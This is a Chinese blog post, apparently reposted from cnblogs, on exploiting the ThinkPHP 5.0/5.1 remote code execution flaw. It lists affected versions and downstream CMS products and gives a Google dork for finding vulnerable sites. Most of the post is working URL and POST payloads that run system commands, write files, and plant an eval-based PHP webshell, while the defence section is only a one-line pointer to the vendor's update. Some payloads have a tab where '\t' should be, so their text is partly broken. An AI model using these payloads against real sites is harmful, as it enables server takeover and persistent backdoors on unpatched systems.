• Thinkphp5命令执行利用


    漏洞概述

      ThinkPHP是一个免费开源的,快速简单的面向对象的轻量级PHP开发框架。该框架常被用来进行二次开发,国内应用非常广泛。

      该漏洞出现的原因在于ThinkPHP5框架底层对控制器名过滤不严,从而让攻击者可以通过url调用到ThinkPHP框架内部的敏感函数,进而导致getshell漏洞

    intext:十年磨一剑 - 为API开发设计的高性能框架

    影响版本:

    • ThinkPHP 5.0.5-5.0.22
    • ThinkPHP 5.1.0-5.1.30

    影响范围:

    • AdminLTE后台管理系统
    • layui后台管理系统
    • thinkcmf
    • H-ui.admin后台管理系统
    • tpshop
    • FsatAdmin
    • eyoucms
    • LarryCMS后台管理系统
    • tpadmin后台管理系统
    • snake后台管理系统
    • ThinkSNS
    • DolphinPHP后台管理系统
    • WeMall商城系统
    • CLTPHP
    • 齐博CMS
    • DSMALL
    • YFCMF
    • HisiPHP后台管理系统
    • Tplay后台管理系统
    • lyadmin后台管理系统
    • haoid后台管理系统

    Google语法:

    intext:十年磨一剑 - 为API开发设计的高性能框架

    搜索得到:

    通过phpinfo函数写出phpinfo()的信息,测试是否存在thinphp5的漏洞

    /index.php?s=index/	hinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1  #普遍适用的playload 
    index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()
    /index.php?s=index/	hinkRequest/input&filter=phpinfo&data=1&vars[1][]=whoami 
    /?s=admin/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

    进行远程命令执行:

    /index.php?s=index/	hinkRequest/input&filter=phpinfo&data=1&vars[1][]=whoami
    /index.php?s=captcha
    post:_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls 
    index.php?s=captcha 或者 index.php
    post:c=system&f=ls&_method=filter
    s=index/	hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id 
    s=index/	hinkContainer/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

    写入一句话或者大马:

    /index.php/?s=index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=file_put_contents&vars%5B1%5D%5B%5D=readme.txt&vars%5B1%5D%5B%5D=1  
    /?s=index/	hinkapp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=1.php&vars[1][]=<?php phpinfo();?>
    index.php?s=/index/	hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^%3C?php%20@eval($_GET[%22code%22])?^%3E%3Eshell.php
    

     

    漏洞防御:

    目前,ThinkPHP官方已经发布更新修复了该漏洞,建议用户及时确认是否受到漏洞影响,尽快采取修补措施。官方链接如下:

    http://www.thinkphp.cn/down.html 

  • 相关阅读:
    vue 中的const {XXX } =this 的作用效果
    <a href="javascript:;">的用法说明
    iOS抓包工具Charles —— 破解、抓包入门
    iOS抓包工具Charles
    Android抓包方法(一)之Fiddler代理
    appium+python自动化24-滑动方法封装(swipe)
    Appium移动自动化测试(五)--app控件获取之uiautomatorviewer
    appium自动化框架项目实战1——app初次使用引导页
    一个完整的Appium手机自动化测试实例
    Appium提高脚本复用、可配置性
  • 原文地址:https://www.cnblogs.com/someone9/p/10435751.html
Copyright © 2020-2023  润新知